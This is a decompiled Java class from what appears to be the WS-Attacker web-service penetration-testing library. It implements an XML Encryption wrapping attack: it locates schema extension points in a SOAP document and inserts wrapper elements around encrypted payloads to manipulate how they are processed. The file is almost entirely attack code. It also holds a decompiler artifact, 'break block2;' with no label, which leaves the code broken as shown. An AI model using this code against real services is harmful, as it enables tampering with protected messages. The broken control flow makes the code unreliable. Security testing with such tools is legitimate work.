/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness;

import java.util.ArrayList;
import java.util.List;
import java.util.Set;
import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import wsattacker.library.schemaanalyzer.AnyElementProperties;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.xpath.analysis.WrapperProperties;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractEncryptionWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractWeaknessComposite;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.EncryptionAttributeIdWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.FactoryWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.WeaknessType;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractEncryptionElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class EncryptionSchemaWeakness
extends AbstractWeaknessComposite {
    private final List<WrapperProperties> m_WrapperProperties = new ArrayList<WrapperProperties>();
    public static final Logger LOG = Logger.getLogger(EncryptionSchemaWeakness.class);
    private int m_NumPostProcessPossible;

    public EncryptionSchemaWeakness(AbstractEncryptionElement encPay, EncryptedKeyElement encKey) throws InvalidWeaknessException {
        this.determineEncSignMode(encPay, encKey);
        this.m_EncKey = encKey;
        this.m_EncPay = encPay;
    }

    public void findSchemaWeakness(SchemaAnalyzer schemaAnalyzer) throws InvalidWeaknessException {
        Element encPayElement = this.m_EncPay.getEncryptedElement();
        Document doc = encPayElement.getOwnerDocument();
        ArrayList<Element> matched = new ArrayList<Element>();
        matched.add(doc.getDocumentElement());
        LOG.info((Object)("init: Matched " + ((Object)matched).toString()));
        for (Element ele : matched) {
            Set schemaWeaknesses = schemaAnalyzer.findExpansionPoint(ele);
            for (AnyElementProperties extension : schemaWeaknesses) {
                int factor;
                WrapperProperties wp = new WrapperProperties(extension, encPayElement);
                int n = factor = wp.isWrapperNeeded() ? 1 : 2;
                if (LOG.isDebugEnabled()) {
                    LOG.debug((Object)String.format("Parent: %s / Positions: %d / wrapper needed? %b", extension.getDocumentElement().getNodeName(), wp.getPossiblePositions(), wp.isWrapperNeeded()));
                }
                this.m_PossibleWeaks += factor * wp.getPossiblePositions();
                this.m_WrapperProperties.add(wp);
            }
        }
        EncryptionAttributeIdWeakness aw = (EncryptionAttributeIdWeakness)FactoryWeakness.generateWeakness(WeaknessType.ATTR_ID_WEAKNESS, this.m_EncPay, this.m_EncKey);
        if (0 < aw.getPossibleNumWeaks()) {
            this.m_WeaknessList.add(aw);
            this.m_NumPostProcessPossible += aw.getPossibleNumWeaks();
        }
    }

    @Override
    public void abuseWeakness(int index, Element encKey, Element payloadElement) {
        boolean useRealWrapper = true;
        int wrapperPropertiesIndex = -1;
        int childIndex = -1;
        if (index >= this.getPossibleNumWeaks()) {
            String warn = String.format("Index >= numberOfPossibilites (%d >= %d)", index, this.m_PossibleWeaks);
            LOG.warn((Object)warn);
            throw new IllegalArgumentException(warn);
        }
        int postProcessListIndex = -1;
        int postProcessAbuseIndex = 0;
        for (AbstractEncryptionWeakness aw : this.m_WeaknessList) {
            ++postProcessListIndex;
            if (index > this.m_PossibleWeaks * aw.getPossibleNumWeaks()) {
                index -= this.m_PossibleWeaks * aw.getPossibleNumWeaks();
                continue;
            }
            while (index >= this.m_PossibleWeaks) {
                index -= this.m_PossibleWeaks;
                ++postProcessAbuseIndex;
            }
            break block2;
        }
        for (int i = 0; i < this.m_WrapperProperties.size(); ++i) {
            WrapperProperties wp = this.m_WrapperProperties.get(i);
            if (index < wp.getPossiblePositions()) {
                childIndex = index;
                wrapperPropertiesIndex = i;
                break;
            }
            if (!wp.isWrapperNeeded() && (index -= wp.getPossiblePositions()) < wp.getPossiblePositions()) {
                childIndex = index;
                useRealWrapper = false;
                wrapperPropertiesIndex = i;
                break;
            }
            index -= wp.getPossiblePositions();
        }
        try {
            this.abuseWeakness(wrapperPropertiesIndex, childIndex, useRealWrapper, encKey, payloadElement, postProcessListIndex, postProcessAbuseIndex);
        }
        catch (InvalidWeaknessException ex) {
            LOG.error((Object)ex);
        }
    }

    protected void abuseWeakness(int wrapperPropertiesIndex, int childIndex, boolean useRealWrapper, Element encKey, Element payloadElement, int postProcessListIndex, int postProcessAbuseIndex) throws InvalidWeaknessException {
        List children;
        Element wrapper;
        WrapperProperties wrapperProperty = this.m_WrapperProperties.get(wrapperPropertiesIndex);
        AnyElementProperties anyElementProperties = wrapperProperty.getAnyElementPorperties();
        Element wrapperParent = DomUtilities.findCorrespondingElement((Document)payloadElement.getOwnerDocument(), (Element)anyElementProperties.getDocumentElement());
        if (useRealWrapper) {
            LOG.trace((Object)"Surrounding singnedPostPart with real Wrapper Element!");
            wrapper = wrapperParent.getOwnerDocument().createElementNS("http://sourceforge.net/projects/ws-attacker/", "wsatk:wrapper");
            wrapper.appendChild(payloadElement);
        } else {
            wrapper = payloadElement;
        }
        if (anyElementProperties.getProcessContentsAttribute().equals("##strict")) {
            Element env = wrapper.getOwnerDocument().getDocumentElement();
            Element tmp = env.getOwnerDocument().createElementNS(env.getNamespaceURI(), env.getPrefix() + ":Header");
            tmp.appendChild(wrapper);
            wrapper = tmp;
        }
        if (childIndex < (children = DomUtilities.getAllChildElements((Element)wrapperParent)).size()) {
            if (LOG.isDebugEnabled()) {
                LOG.trace((Object)("Inserting Wrapper " + wrapper.getNodeName() + " before " + ((Element)children.get(childIndex)).getNodeName() + " Element as a child of " + wrapperParent.getNodeName()));
            }
            wrapperParent.insertBefore(wrapper, (Node)children.get(childIndex));
        } else {
            if (LOG.isDebugEnabled()) {
                LOG.trace((Object)("Appending Wrapper on " + wrapperParent.getNodeName()));
            }
            wrapperParent.appendChild(wrapper);
        }
        if (postProcessListIndex >= 0) {
            ((AbstractEncryptionWeakness)this.m_WeaknessList.get(postProcessListIndex)).abuseWeakness(postProcessAbuseIndex, encKey, payloadElement);
        }
    }

    public List<WrapperProperties> getWrapperProperties() {
        return this.m_WrapperProperties;
    }

    @Override
    public int getPossibleNumWeaks() {
        return this.m_NumPostProcessPossible > 0 ? this.m_PossibleWeaks * this.m_NumPostProcessPossible : this.m_PossibleWeaks;
    }
}

